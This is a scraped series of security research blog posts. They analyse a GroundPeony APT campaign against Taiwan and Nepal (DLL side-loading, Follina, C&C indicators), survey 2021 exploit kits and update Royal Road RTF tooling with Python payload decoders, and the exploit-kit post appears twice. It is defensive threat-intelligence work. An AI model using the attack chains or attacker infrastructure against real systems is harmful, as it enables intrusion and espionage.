at a specific case. The first is the attack on the Taiwanese government that occurred in March 2023. <img src="https://nao-sec.org/assets/2023-08-22/flow.png" alt="" /> The attack started from spear-phishing email. The email has a DOC file attached. And, a URL is written in the DOC file, and the ZIP file is downloaded by the URL. The ZIP file contains EXE file and DLL file. And executing them, infects malware. <img src="https://nao-sec.org/assets/2023-08-22/mail.png" alt="" /> The spear-phishing email looked like this. It is about discussions on maritime issues between Taiwan and the USA. This time, I put a mosaic in the image, but the destination was the Taiwanese government organication. Also, the source is cable TV company in Taiwan. Attached to the email is a DOC file with the file name “Regarding bilateral consultations with the USA”. <img src="https://nao-sec.org/assets/2023-08-22/doc.png" alt="" /> When open the attached DOC file, it looks like this. It pretends to have an error instead of something like a file name. It says to apply an update to resolve the error. The URL is written for the download of the update. When try to download the update file from this URL, it actually downloads ZIP file containing malware. <img src="https://nao-sec.org/assets/2023-08-22/url.png" alt="" /> The URL used at this time is very strange. At first glance, it may look like a legitimate Microsoft website. But, due to the structure of the URL, the original host information is Cuttly. When access this URL, you will access to Cuttly. And it will redirect to ZIP file. At this time, the URL redirected from Cuttly was the website of a Taiwanese educational institution. But, this website was compromised, and a ZIP file containing malware was placed. <img src="https://nao-sec.org/assets/2023-08-22/zip.png" alt="" /> The ZIP file contains 2 EXE files, one TXT file, and one directory named “$RECYCLE.BIN” that looks like Windows trash box. There are 4 files in the $RECYCLE.BIN directory, all with the DOCX extension. But these are not DOCX files. They are actually malware. By the way, did you notice that the update number written in the DOC file and the ZIP file are different? We don’t know if this was simply a mistake by the attacker or a remnant of another ongoing attack campaign. <img src="https://nao-sec.org/assets/2023-08-22/kb.png" alt="" /> <h2 id="malware-analysis">Malware Analysis</h2> Let’s take a look at how malware is executed. First, there are 2 files with the EXE extension included in the ZIP file, 系統安全補丁.exe and Install.exe. But the behavior is the same. When the EXE file is executed, the 4 files placed in $RECYCLE.BIN will be copied to the mic directory under the ProgramData directory. At this time, the names of the 4 files are also changed. The 4 files are renamed to mic.exe, version.dll, mic.doc and mic.ver. And then, mic.exe is executed. mic.exe is a legitimate file with a digital signature. But, it loads version.dll which exists in the same directory. When version.dll is executed by DLL Side-Loading, it loads and decrypts mic.doc. The decryption result is malware we call “micDown” <img src="https://nao-sec.org/assets/2023-08-22/micdown.png" alt="" /> <ol> <li>mic.exe <ul> <li>Legitimate EXE file with a digital signature</li> </ul> </li> <li>version.dll <ul> <li>DLL for Side-Loading</li> <li>Shellcode launcher for mic.doc</li> </ul> </li> <li>mic.doc <ul> <li>Shellcode downloader (micDown)</li> </ul> </li> <li>mic.ver <ul> <li>Config file for micDown</li> </ul> </li> </ol> Decoding of version.dll process is in two steps. First version.dll decodes mic.doc and executes it as shellcode. The shellcode further decodes itself and continues execution. <img src="https://nao-sec.org/assets/2023-08-22/versiondll.png" alt="" /> The export function of version.dll is very simple. First, it reads mic.doc into the memory area allocated by VirtualAlloc with read, write, and execute permissions. Then, it decodes that data with a custom XOR algorithm that combines sub, xor add instructions. When decoding is complete, the process moves to the memory area where the decoded shellcode is located. <img src="https://nao-sec.org/assets/2023-08-22/dll1.png" alt="" /> <img src="https://nao-sec.org/assets/2023-08-22/dll2.png" alt="" /> The decoded shellcode uses the same custom XOR algorithm as before. The RtlDecompressBuffer is then used to decompress. The shellcode is decoded from the beginning of the file, excluding jump instruction. <img src="https://nao-sec.org/assets/2023-08-22/doc1.png" alt="" /> <img src="https://nao-sec.org/assets/2023-08-22/doc2.png" alt="" /> The decoded code executes the executable with the MZ header removed. It also decodes the data in mic.ver and uses it as a configuration. Finally, it downloads and executes the shellcode from the C&C server, saved in the config. <img src="https://nao-sec.org/assets/2023-08-22/payload1.png" alt="" /> <img src="https://nao-sec.org/assets/2023-08-22/payload2.png" alt="" /> The shellcode is encoded with an algorithm similar to that of a previous file. It differs slightly from the file encoding algorithm in that the order of the add,sub,xor instruction is swapped. <img src="https://nao-sec.org/assets/2023-08-22/payload3.png" alt="" /> <img src="https://nao-sec.org/assets/2023-08-22/payload4.png" alt="" /> <img src="https://nao-sec.org/assets/2023-08-22/payload5.png" alt="" /> The encoded config consists of a 0x40 byte C&C host area and a 0x2 byte port area. The IP address at this time was 103[.]199.17.184. <img src="https://nao-sec.org/assets/2023-08-22/ver1.png" alt="" /> <img src="https://nao-sec.org/assets/2023-08-22/ver2.png" alt="" /> <h2 id="related-file">Related File</h2> An attack similar to the Taiwanese attack we have previously described was also carried out in Nepal. Although the specific origin of the attack is unknown, a legitimate website was compromised and a ZIP file was installed, as was the case in Taiwan. The legitimate website that was compromised was the Nepalese government’s COVID-19 vaccine-related website. For reference, China is known to have provided vaccines to Nepal as part of its One Belt, One Road partnership<a href="#fn:2" class="footnote" rel="footnote">2</a>. It is unclear what this has to do with the attacking campaing. In the attack against Nepal, app.onedrivo[.] com was used as the C&C server. The domain was taken using PublicDomainRegistry. More on this domain later. In the attack against Nepal, the malware behaves the same way. When the EXE file is executed, it copies and renames the file and executes mic.exe. mic.exe sideloads version.dll. Then version.dll will read, decode and execute mic.doc. The malware executed was the same as the previous one, called micDown. <img src="https://nao-sec.org/assets/2023-08-22/flow2.png" alt="" /> <h2 id="related-past-campaign">Related Past Campaign</h2> The C&C server used in the previous attack on Nepal has been used in other attacks in the past. The attack on Nepal occurred in April 2022. At that time, this group exploited CVE-2022-30190, also known as Follina. Finally, the CobaltStrike beacon is executed. This domain was used as the server to download this CobaltStrike and as the C&C server. <img src="https://nao-sec.org/assets/2023-08-22/past.png" alt="" /> The DOCX file that served as the decoy is a statement of accusation by a person claiming to be a student at Kathmandu University. We do not know the authenticity of this accusation. <img src="https://nao-sec.org/assets/2023-08-22/decoy.png" alt="" /> This DOCX file contains the external link settings. This will load the HTML file. The HTML file contains JavaScript code to change the location. The modified location is written with the scheme ms-msdt. This is the scheme for the Microsoft Support Diagnostic Tool. However,a bug existed in this that allowed PowerShell code to be executed. So, PowerShell code to be executed from a DOCX file. <img src="https://nao-sec.org/assets/2023-08-22/xml.png" alt="" /> The PowerShell code is downloaded, extracted and executed to a CAB file from the server. <img src="https://nao-sec.org/assets/2023-08-22/ps1.png" alt="" /> Inside the CAB file is an EXE file made by PyInstaller. This EXE is a downloader. And can be downloaded from onedrivo[.]com and run the CobaltStrike beacon. <img src="https://nao-sec.org/assets/2023-08-22/pyi.png" alt="" /> <h2 id="attribution">Attribution</h2> Let us consider the attribution of this group. To begin with, it is important when this group was exploiting Follina. Follina was finally exploited by a very large number of APT groups. But that was after the details were made public. Here is the timeline. <img src="https://nao-sec.org/assets/2023-08-22/follina.png" alt="" /> The first time Follina became known to the public was through our tweets. We discovered the Follina sample against Belarus on May 27 and tweeted about it. Since then, detailed explanatory blogs have been published and PoCs have been released. Going back earlier, a vulnerability was reported to Microsoft by the ShadowChasing group on April 12. However, Microsoft did not acknowledge it as a vulnerability at that time. The attack reported is also against Belarus. Let’s go back further. In our research, we found samples from April 7 and 8. These are attacks against Nepal and India. We believe this is the earliest Follina sample. And these are the attacks by the group Mandiant calls UNC3347, which we call GroundPeony. In other words, GroundPeony was exploiting Follina during a perfect zero-day period. Various organizations have written reports about Follina exploits, but China-nexus is the only group that has exploited Follina during zero-day periods. Therefore, we believe GroundPeony is the only China-nexus APT group with zero-day access. Let’s look at another indicator. We analyzed an EXE file made by PyInstaller that is executed after the Follina exploit. The PyInstaller binary can easily decompile the Python code. The extracted file looked like this. <img src="https://nao-sec.org/assets/2023-08-22/python.png" alt="" /> A large amount of Chinese comments were written. Also, the code was copy-pasted from various public repositories, but most of it was written by Chinese developer. This is a very elementary mistake. However, it is highly likely that the person who created the malware is a native Chinese speaker. We tried mapping the victim (or presumed to be). A very interesting diagram. What does this mean? <img src="https://nao-sec.org/assets/2023-08-22/map.png" alt="" /> Based on our previous research, we have created a diamond model. <img src="https://nao-sec.org/assets/2023-08-22/diamond.png" alt="" /> GroundPeony, also known as UNC3347, is a China-nexus APT group. They have been active since at least 2021. They target East and South Asia like Taiwan and Nepal. In particular, they seem to be targeting government agencies, research institutions, and telecoms. The attacks begin with spear phishing emails. They compromised legitimate websites and use them for their attacks. There was nothing unique about the IP addresses used, and no connection to the victim country could be found. GroundPeony also provides zero-day access. Besides popular tools such as CobaltStrike, they also use group’s original malware. <h2 id="wrap-up">Wrap-Up</h2> GroundPeony is an APT group of which little is known so far. It is believed to be China-nexus. It is targeting East and South Asian countries like Taiwan and Nepal. In particular, they seem to be targeting government agencies, research institutions, and telecoms. One point worth noting is their use of zero-day. Follina was exploited in its early period. This group also compromised legitimate websites and install malware. GroundPeony is an aggressive APT group. Please keep an eye on their future developments. <h2 id="ioc">IoC</h2> <ul> <li>103[.]199.17.184</li> <li>160[.]20.145.111</li> <li>172[.]93.189.239</li> <li>*.onedrivo[.]com</li> <li>1992b552bdaf93caeb470f94b4bf91e0157ba4a9bb92fb8430be946c0ddabdeb</li> <li>425630cc8be2a7dc2626ccd927bb45e5d40c1cb606bb5b2a7e8928df010af7c9</li> <li>fa6510a84929a0c49d91b3887189fca5a310129912d8e7d14fed062e9446af7e</li> <li>142a027d78c7ab5b425c2b849b347952196b03618e4ad74452dbe2ed4e3f73cd</li> <li>d1989ca12426ed368816ce00f08975dc1ff1e4f474592523c40f9af344a57b49</li> <li>6e13e5c7fcbafc47df259f2565efaed51bc1d021010c51673a7c455b5d4dad2b</li> <li>ef611e07e9d7e20ed3d215e4f407a7a7ca9f64308905c37e53df39f8a5bcbb3c</li> <li>7b814e43af86a84b9ad16d47f9c74da484ea69903ef0fbe40ec62ba123d83a9a</li> <li>f3e0a3dd3d97ccc23c4cee0fd9c247dbe79fbf39bc9ae9152d4676c96e46e483</li> <li>50182fca4c22c7dde7b8392ceb4c0fef67129f7dc386631e6db39dec73537705</li> </ul> <h2 id="references">References</h2> <div class="footnotes" role="doc-endnotes"> <ol> <li id="fn:1" role="doc-endnote"> Mandiant, “Move, Patch, Get Out the Way: 2022 Zero-Day Exploitation Continues at an Elevated Pace”, https://www.mandiant.com/resources/blog/zero-days-exploited-2022 <a href="#fnref:1" class="reversefootnote" role="doc-backlink">↩</a> </li> <li id="fn:2" role="doc-endnote"> Ministry of Foreign Affairs of the People’s Republic of China, “Initiative for Belt and Road Partnership on COVID-19 Vaccines Cooperation”, https://www.fmprc.gov.cn/mfa_eng/wjdt_665385/2649_665393/202106/t20210624_9170568.html <a href="#fnref:2" class="reversefootnote" role="doc-backlink">↩</a> </li> </ol> </div>
Exploit Kit still sharpens a sword

Thu, 15 Apr 2021 15:00:00 -0000

Note: This blog post doesn’t make sense to many It’s 2021 now. Moreover, the quarter has already passed. I thought Drive-by Download attack was dead four years ago. Angler Exploit Kit has disappeared, pseudo-Darkleech and EITest campaign have disappeared, and RIG Exploit Kit has also declined. At that time, Drive-by Download attack was definitely supposed to die. However, even if in 2021, it will not disappear fire still slightly. In April 2021, I received some incredible notices. For example, there are the following notifications. PurpleFox Exploit Kit has started exploiting CVE-2021-26411 RIG Exploit Kit has started exploiting CVE-2021-26411 Bottle Exploit Kit is back, and has started exploiting CVE-2020-1380 and CVE-2021-26411 Underminer Exploit Kit is back Repeat again. It’s 2021 now. Not 2017. Internet Explorer was taken away by Chrome and Edge, and Drive-by Download attack was supposed to die. Why are there still Drive-by Download attacks? Here are some reasons, including the opinions of your friends. Internet Explorer is still used in some countries/regions including Japan Due to the influence of corona, remote work has increased, and the number of users with network security vulnerabilities has increased Internet Explorer vulnerabilities still discovered and exploit code published In reality, these are intricately intertwined, and there may be different reasons. In any case, Drive-by Download attacks are still being observed. Moreover, it is a little more active. This is irrelevant for most people. Because most people don’t use Internet Explorer. If you don’t use Internet Explorer, a typical Exploit Kit attack is not a threat. A small number of targeted attacks may use Chrome’s 0day, which is not discussed here. For the few enthusiastic Internet Explorer users that exist, I write this blog post. In other words, as of April 2021, I will introduce the characteristics of common Drive-by Download attacks that you may encounter. Thanks to my friends (@jeromesegura, @nao_sec members) for helping me write this blog post. Exploit Kit Landscape As of April 2021, the following 6 types of Exploit Kits have been observed to be active. RIG Spelevo PurpleFox Underminer Bottle Magnitude nao_sec has been running a fully automatic Drive-by Download attack observation environment called Augma System[1] for three years. The data observed by this is as follows. Some Exploit Kits are not counted because they are observed in different environments. The features of the 6 types of Exploit Kits currently observed are as follows. Private Update Exploit RIG No Yes CVE-2020-0674, CVE-2021-26411 Spelevo No No CVE-2018-8174, CVE-2018-15982 PurpleFox Yes Yes CVE-2021-26411 Underminer Yes No CVE-2018-15982 Bottle Yes Yes CVE-2020-1380, CVE-2021-26411 Magnitude Yes Yes CVE-2021-26411 Here is sample traffic for each. RIG Exploit Kit RIG is an Exploit Kit that has been active since around 2014. It was extremely active from 2016 to 2017, but then declined with the advent of Fallout and others. However, it is still active in 2021. RIG started abusing CVE-2021-26411 in April 2021 and are still incorporating changes. Landing Pages are not obfuscated as they used to be. Very simple code. The malware is RC4 encrypted. Download sample traffic here. Spelevo Exploit Kit Spelevo is an Exploit Kit that appeared in 2019. 2020 was very mature, but 2021 is one of the most active Exploit Kits. Spelevo hasn’t changed for a long time. Spelevo hides the malware in the image. See this article[2] for detailed behavior. Download sample traffic here. PurpleFox Exploit Kit PurpleFox is an Exploit Kit that has been active since 2019. A private exploit kit for sending PurpleFox malware. It’s enthusiastic about exploit and is fairly fast at incorporating new vulnerabilities. Spelevo has started to exploit CVE-2021-26411 in April 2021. However, the other parts have not changed for a long time. Download sample traffic here. Underminer Exploit Kit Underminer is an Exploit Kit that appeared in 2018. It’s a pretty distinctive Exploit Kit. It is known to be extremely difficult to analyze. It is used to deliver its unique malware called Hidden Bee. See this article[3] for more details. Underminer has a cycle of activity for several months and then silence for several months. It has been silent since the November 2020, but was revived in April 2021. But the essence hasn’t changed at all. Download sample traffic here. Bottle Exploit Kit Bottle is an Exploit Kit that appeared in 2019. An extremely rare Exploit Kit that targets only Japan. It is used to deliver its unique malware called Cinobi. It is one of the most active Exploit Kits in Japan. It has not been observed since November 2020, but it was revived in April 2021. It’s also worth noting that unlike other Exploit Kits, it exploits CVE-2020-1380 and CVE-2021-26411. It has been pointed out that it is related to MageCart and phishing campaigns. See this article[4] for more details. Download sample traffic here. Magnitude Exploit Kit Magnitude is one of the oldest existing Exploit Kits. It has been observed only in certain countries/regions such as South Korea and Taiwan, and the details have not been reported much. Its activity was also reported in April 2021. It exploits CVE-2021-26411 and is still actively evolving. One more: #MagnitudeEK pic.twitter.com/pOuIZzAPZG— Jérôme Segura (@jeromesegura) April 14, 2021 Finally Drive-by Download attacks are still observed in 2021. It has nothing to do with most people. As with Adobe Flash Player, stop using Internet Explorer immediately. That is the simplest solution. Drive-by Download attacks continue to exist with Internet Explorer. References [1] https://www.virusbulletin.com/uploads/pdf/conference_slides/2019/VB2019-KoikeChubachi.pdf [2] https://insight-jp.nttsecurity.com/post/102gsqj/pseudogatespelevo-exploit-kit [3] https://blog.malwarebytes.com/threat-analysis/2019/08/the-hidden-bee-infection-chain-part-1-the-stegano-pack/ [4] http://jsac.jpcert.or.jp/archive/2021/pdf/JSAC2021_103_koike-takai_jp.pdf

Note: This blog post doesn’t make sense to many It’s 2021 now. Moreover, the quarter has already passed. I thought Drive-by Download attack was dead four years ago. Angler Exploit Kit has disappeared, pseudo-Darkleech and EITest campaign have disappeared, and RIG Exploit Kit has also declined. At that time, Drive-by Download attack was definitely supposed to die. However, even if in 2021, it will not disappear fire still slightly. In April 2021, I received some incredible notices. For example, there are the following notifications. <ul> <li>PurpleFox Exploit Kit has started exploiting CVE-2021-26411</li> <li>RIG Exploit Kit has started exploiting CVE-2021-26411</li> <li>Bottle Exploit Kit is back, and has started exploiting CVE-2020-1380 and CVE-2021-26411</li> <li>Underminer Exploit Kit is back</li> </ul> Repeat again. It’s 2021 now. Not 2017. Internet Explorer was taken away by Chrome and Edge, and Drive-by Download attack was supposed to die. Why are there still Drive-by Download attacks? Here are some reasons, including the opinions of your friends. <ol> <li>Internet Explorer is still used in some countries/regions including Japan</li> <li>Due to the influence of corona, remote work has increased, and the number of users with network security vulnerabilities has increased</li> <li>Internet Explorer vulnerabilities still discovered and exploit code published</li> </ol> In reality, these are intricately intertwined, and there may be different reasons. In any case, Drive-by Download attacks are still being observed. Moreover, it is a little more active. This is irrelevant for most people. Because most people don’t use Internet Explorer. If you don’t use Internet Explorer, a typical Exploit Kit attack is not a threat. A small number of targeted attacks may use Chrome’s 0day, which is not discussed here. For the few enthusiastic Internet Explorer users that exist, I write this blog post. In other words, as of April 2021, I will introduce the characteristics of common Drive-by Download attacks that you may encounter. Thanks to my friends (@jeromesegura, @nao_sec members) for helping me write this blog post. <h2 id="exploit-kit-landscape">Exploit Kit Landscape</h2> As of April 2021, the following 6 types of Exploit Kits have been observed to be active. <ul> <li>RIG</li> <li>Spelevo</li> <li>PurpleFox</li> <li>Underminer</li> <li>Bottle</li> <li>Magnitude</li> </ul> nao_sec has been running a fully automatic Drive-by Download attack observation environment called Augma System[1] for three years. The data observed by this is as follows. Some Exploit Kits are not counted because they are observed in different environments. <img src="https://nao-sec.org/assets/2021-04-16/ek.png" alt="" /> The features of the 6 types of Exploit Kits currently observed are as follows. <table> <thead> <tr> <th> </th> <th>Private</th> <th>Update</th> <th>Exploit</th> </tr> </thead> <tbody> <tr> <td>RIG</td> <td>No</td> <td>Yes</td> <td>CVE-2020-0674, CVE-2021-26411</td> </tr> <tr> <td>Spelevo</td> <td>No</td> <td>No</td> <td>CVE-2018-8174, CVE-2018-15982</td> </tr> <tr> <td>PurpleFox</td> <td>Yes</td> <td>Yes</td> <td>CVE-2021-26411</td> </tr> <tr> <td>Underminer</td> <td>Yes</td> <td>No</td> <td>CVE-2018-15982</td> </tr> <tr> <td>Bottle</td> <td>Yes</td> <td>Yes</td> <td>CVE-2020-1380, CVE-2021-26411</td> </tr> <tr> <td>Magnitude</td> <td>Yes</td> <td>Yes</td> <td>CVE-2021-26411</td> </tr> </tbody> </table> Here is sample traffic for each. <h3 id="rig-exploit-kit">RIG Exploit Kit</h3> RIG is an Exploit Kit that has been active since around 2014. It was extremely active from 2016 to 2017, but then declined with the advent of Fallout and others. However, it is still active in 2021. RIG started abusing CVE-2021-26411 in April 2021 and are still incorporating changes. Landing Pages are not obfuscated as they used to be. Very simple code. The malware is RC4 encrypted. <img src="https://nao-sec.org/assets/2021-04-16/rig.png" alt="" /> Download sample traffic <a href="https://nao-sec.org/assets/2021-04-16/rig.saz">here</a>. <h3 id="spelevo-exploit-kit">Spelevo Exploit Kit</h3> Spelevo is an Exploit Kit that appeared in 2019. 2020 was very mature, but 2021 is one of the most active Exploit Kits. Spelevo hasn’t changed for a long time. Spelevo hides the malware in the image. See this article[2] for detailed behavior. <img src="https://nao-sec.org/assets/2021-04-16/spelevo.png" alt="" /> Download sample traffic <a href="https://nao-sec.org/assets/2021-04-16/spelevo.saz">here</a>. <h3 id="purplefox-exploit-kit">PurpleFox Exploit Kit</h3> PurpleFox is an Exploit Kit that has been active since 2019. A private exploit kit for sending PurpleFox malware. It’s enthusiastic about exploit and is fairly fast at incorporating new vulnerabilities. Spelevo has started to exploit CVE-2021-26411 in April 2021. However, the other parts have not changed for a long time. <img src="https://nao-sec.org/assets/2021-04-16/purplefox.png" alt="" /> Download sample traffic <a href="https://nao-sec.org/assets/2021-04-16/purplefox.saz">here</a>. <h3 id="underminer-exploit-kit">Underminer Exploit Kit</h3> Underminer is an Exploit Kit that appeared in 2018. It’s a pretty distinctive Exploit Kit. It is known to be extremely difficult to analyze. It is used to deliver its unique malware called Hidden Bee. See this article[3] for more details. Underminer has a cycle of activity for several months and then silence for several months. It has been silent since the November 2020, but was revived in April 2021. But the essence hasn’t changed at all. <img src="https://nao-sec.org/assets/2021-04-16/underminer.png" alt="" /> Download sample traffic <a href="https://nao-sec.org/assets/2021-04-16/underminer.saz">here</a>. <h3 id="bottle-exploit-kit">Bottle Exploit Kit</h3> Bottle is an Exploit Kit that appeared in 2019. An extremely rare Exploit Kit that targets only Japan. It is used to deliver its unique malware called Cinobi. It is one of the most active Exploit Kits in Japan. It has not been observed since November 2020, but it was revived in April 2021. It’s also worth noting that unlike other Exploit Kits, it exploits CVE-2020-1380 and CVE-2021-26411. It has been pointed out that it is related to MageCart and phishing campaigns. See this article[4] for more details. <img src="https://nao-sec.org/assets/2021-04-16/bottle.png" alt="" /> Download sample traffic <a href="https://nao-sec.org/assets/2021-04-16/bottle.saz">here</a>. <h3 id="magnitude-exploit-kit">Magnitude Exploit Kit</h3> Magnitude is one of the oldest existing Exploit Kits. It has been observed only in certain countries/regions such as South Korea and Taiwan, and the details have not been reported much. Its activity was also reported in April 2021. It exploits CVE-2021-26411 and is still actively evolving. <blockquote class="twitter-tweet">One more: <a href="https://twitter.com/hashtag/MagnitudeEK?src=hash&ref_src=twsrc%5Etfw">#MagnitudeEK</a> <a href="https://t.co/pOuIZzAPZG">pic.twitter.com/pOuIZzAPZG</a>— Jérôme Segura (@jeromesegura) <a href="https://twitter.com/jeromesegura/status/1382395637480656896?ref_src=twsrc%5Etfw">April 14, 2021</a></blockquote> <script async="" src="https://platform.twitter.com/widgets.js" charset="utf-8"></script> <h2 id="finally">Finally</h2> Drive-by Download attacks are still observed in 2021. It has nothing to do with most people. As with Adobe Flash Player, stop using Internet Explorer immediately. That is the simplest solution. Drive-by Download attacks continue to exist with Internet Explorer. <h2 id="references">References</h2> [1] <a href="https://www.virusbulletin.com/uploads/pdf/conference_slides/2019/VB2019-KoikeChubachi.pdf">https://www.virusbulletin.com/uploads/pdf/conference_slides/2019/VB2019-KoikeChubachi.pdf</a> [2] <a href="https://insight-jp.nttsecurity.com/post/102gsqj/pseudogatespelevo-exploit-kit">https://insight-jp.nttsecurity.com/post/102gsqj/pseudogatespelevo-exploit-kit</a> [3] <a href="https://blog.malwarebytes.com/threat-analysis/2019/08/the-hidden-bee-infection-chain-part-1-the-stegano-pack/">https://blog.malwarebytes.com/threat-analysis/2019/08/the-hidden-bee-infection-chain-part-1-the-stegano-pack/</a> [4] <a href="http://jsac.jpcert.or.jp/archive/2021/pdf/JSAC2021_103_koike-takai_jp.pdf">http://jsac.jpcert.or.jp/archive/2021/pdf/JSAC2021_103_koike-takai_jp.pdf</a>
Royal Road! Re:Dive

Mon, 04 Jan 2021 15:00:00 -0000

Abstract We introduced the “Royal Road RTF Weaponizer” in our previous blog [1] (and presented at Japan Security Analyst Conference 2020 and CPX 360 CPRCon 2020). Royal Road is a tool shared by many targeted attack groups believed to belong to China. It’s been a year since our previous blog, and Royal Road is still in use. Here, we will introduce the Royal Road-related attacks observed during 2020. Previous Blog Let’s briefly review the previous blog. Royal Road is a tool that generates RTF files that exploit the Microsoft Office Equation Editor vulnerabilities (CVE-2017-11882, CVE-2018-0798, CVE-2018-0802). The details of the tool are unknown, but the RTF file generated by it has various characteristics. The definition of “RTF file generated by Royal Road” may vary from researcher to researcher. Therefore, we define a file that meets the following conditions as an “RTF file generated by Royal Road”. Exploiting a vulnerability in Microsoft Office Equation Editor Containing an object named “8.t” However, some RTF files are likely to be related to Royal Road, even though they don’t meet the second condition. For classification purposes, we refer to this as “Related Samples”. In reality, this may also be an RTF file generated by Royal Road, but the truth is only known to the attacker. Due to the our research, we have divided these into “Royal Road Samples” and “Related Samples”. However, they are treated the same in the specific case studies below. And Royal Road is shared among various attack groups believed to belong to China. Specifically, it is believed to be used by the following attack groups. The attack group alias is written for reference. Strictly speaking, these can be different. For example, TA428 and Pirate Panda are not exactly equivalent. Temp.Tick (BRONZE BUTLER, RedBaldKnight) Temp.Conimes (Goblin Panda, Cycldek) Temp.Periscope (Leviathan, APT40) Temp.Trident (Dagger Panda, IceFog) Tonto (Karma Panda, CactusPete, LoneRanger) TA428 (Pirate Panda) Rancor Also, we categorized the various characteristics of the RTF files used by these groups and showed what they have in common. Updates It’s been a year since we introduced Royal Road. In the meantime, the RTF file, believed to have been generated by Royal Road, has been used many times in targeted attacks, and several updates have been observed. First of all, we will introduce the updates. The RTF file generated by Royal Road contains encoded malware. It is decoded by Shellcode after exploit. In our previous blog, we introduced the following 5 encodings. 4D 5A 90 00 (not encoded) F2 A3 20 72 B2 A6 6D FF B0 74 77 46 B2 5A 6F 00 Many of the RTF files we observed in 2020 used the 3rd and 4th encodings. However, a few samples used the new encodings. The following 2 encodings. A9 A4 6E FE This encoding can be decoded with code like the following: dec_data = [] for i in range(len(enc_data)): dec_data.append(((int.from_bytes(enc_data[i], "little") ^ 0x7b) + 0x7b) % 256) 94 5F DA D8 This encoding can be decoded with code like the following: dec_data = [] xor_key = 1387678300 for i in range(len(enc_data)): for _ in range(7): x0 = (xor_key & 0x20000000) == 0x20000000 x1 = (xor_key & 8) == 8 x2 = xor_key & 1 x3 = 1 + (x0 ^ x1 ^ x2) xor_key = (xor_key + xor_key) + x3 dec_data.append(int.from_bytes(enc_data[i], "little") ^ (xor_key % 256)) Our tool for decrypting Royal Road encoded object is already available on GitHub. It also supports the above new encodings. https://github.com/nao-sec/rr_decoder New Attack Groups As we mentioned earlier, several attack groups use Royal Road. The following eight attack groups have been observed to use Royal Road (including both Royal Road Samples and Related Samples) during 2020. Temp.Conimes Tonto TA428 Naikon Higaisa Vicious Panda FunnyDream TA410 Of these, we have already reported on 1-3 attack groups in our previous blog. Temp.Conimes used NewCore RAT to attack Vietnamese organizations. Tonto used Bisonal to attack organizations in East Asia such as Russia. And the TA428 was also particularly active, using PoisonIvy, Cotx RAT, Tmanger, and nccTrojan to attack East Asian organizations such as Mongolia. We will not cover these individual cases here, but if you are interested, see the IOC chapter. For TA428, the paper [2] and blogs [3][4][5] are available from NSJ (NTT Security Japan). Please refer to that. For Naikon, CheckPoint Research reported [6], but unfortunately, we could not observe this. Therefore, in the following, we will introduce attack cases related to Royal Road for four groups (5-8). Higaisa Higaisa is an attack group that seems to have been active since at least around 2016. It is primarily targeted at North Korean-related organizations and is believed to be aimed at stealing information using AttackBot, PIZ Stealer, and Gh0st RAT. The blogs have been written by Tencent and Positive Technologies so far [7][8][9], and are attributed to (South) Korea. However, NSJ’s paper [10] showed a connection with Ghost Dragon [11] and PKPLUG [12], and it was reported that it might belong to China. We observed an attack by Higaisa on Royal Road in March 2020. The malware executed by the Royal Road RTF was AttackBot. AttackBot is a downloader that has been used by Higaisa since at least April 2018. Vicious Panda Vicious Panda is an attack group reported by CheckPoint Research in March 2020 [13]. It is said to belong to China and targets East Asia such as Russia, Mongolia, and Ukraine. We observed an attack on the Royal Road by Vicious Panda in March 2020. It has been reported to execute malware similar to Enfal and BYEBY. FunnyDream FunnyDream is an attack group that is said to have been active since around 2018. It is said to belong to China and targets Southeast Asia such as Vietnam and Malaysia. FunnyDream uses Chinoxy and FunnyDream Backdoor. BitDefender has published a detailed report [14] on FunnyDream. We observed an attack by FunnyDream from March to May 2020. Chinoxy is a RAT that has been used by FunnyDream since around 2018. It decoded the config using two numeric data and communicates with the C&C server using its original protocol using Blowfish. TA410 TA410 is an attack group that is said to have been active since around 2016. It is said to belong to China and is suspected to be related to APT10. The report has been published by Proofpoint [15][16][17] and is mainly targeted at public sector in the US. It uses malware called LockBack and FlowCloud. We observed an attack by TA410 in October 2020. FlowCloud is a RAT reported by Proofpoint in June 2020. FlowCloud has been reported to be v4 and v5, but the FlowCloud we observed at this time was similar to v4. Attack case against Japan In addition to the four attack groups shown so far (Higaisa, Vicious Panda, FunnyDream, TA410), attacks that appear to be related to Royal Road have been observed. Among them, we will introduce an example of attacks on Japan. We are not able to identify which attack group made this attack. If you have any knowledge about it, please share it with us… The attack on Japan took place in November 2020. The attack began with 2 RTF files attached to the email. These RTF files did not contain an 8.t object, however did contain an associated object. This is the malware encoded by the 4th (B0 74 77 46) encoding shown above. The overall picture of the attack is as follows. The malware executed was an unknown RAT. We call this XLBug RAT because of the characteristics left in this RAT. The RAT held information such as C&C server encoded by Base64 and XOR. The following commands are implemented in XLBug RAT. Get directory information Get file information Get computer information Execute file Upload file Download file Rename file Delete file Delete itself The naming convention and encoding of the encoded object contained in the RTF are similar to those of the TA428. However, we could not say that this was a TA428 attack. Relationship In the previous blog, we summarized the characteristics of attack groups that use Royal Road. We used it to divide the attack groups into two groups. However, by 2020, those characteristics are almost meaningless. It has been standardized or deleted. It’s not as easy to group as it used to be. In the first place, the groups sharing Royal Road should be close. We do not classify further, but if you have any comments please let us know. Yara Rule The GitHub repository we shared in the previous blog is still being updated. https://github.com/nao-sec/yara_rules IOC The IOC sheet shared in the previous blog is still being updated. https://nao-sec.org/jsac2020_ioc.html Tool The tool used by Royal Road to decrypt encoded object is still being updated. https://github.com/nao-sec/rr_decoder Wrap-Up The attacks using Royal Road have decreased compared to 2019, but are still ongoing. There are many cases of attacks by TA428 and Tonto, but other attacks by different attack groups (Higaisa, Vicious Panda, FunnyDream, TA410) have also been observed. The attacks on Japan have also been observed and we were unable to identify this with a known attack group. The use of Royal Road by these unknown attack groups is expected to continue. In addition to Royal Road, there are other cases, such as the Tmanger family, that appear to share tools among multiple targeted attack groups. We should continue to pay close attention to these tool sharing cases. Acknowledgments “nao_sec” is an independent research team that does not belong to any company. Individuals belong to each company and engage in research, but the activities of nao_sec still maintain their independence from each company. We are grateful to all of you who cooperated with our research activities every day. References [1] nao_sec, “An Overhead View of the Royal Road”, https://nao-sec.org/2020/01/an-overhead-view-of-the-royal-road.html [2] NTT Security Japan, “Operation LagTime IT: colourful Panda footprint”, https://vblocalhost.com/uploads/VB2020-Ozawa-etal.pdf [3] NTT Security Japan, “Panda’s New Arsenal: Part 1 Tmanger”, https://insight-jp.nttsecurity.com/post/102gi9b/pandas-new-arsenal-part-1-tmanger [4] NTT Security Japan, “Panda’s New Arsenal: Part 2 Albaniiutas”, https://insight-jp.nttsecurity.com/post/102gkfp/pandas-new-arsenal-part-2-albaniiutas [5] NTT Security Japan, 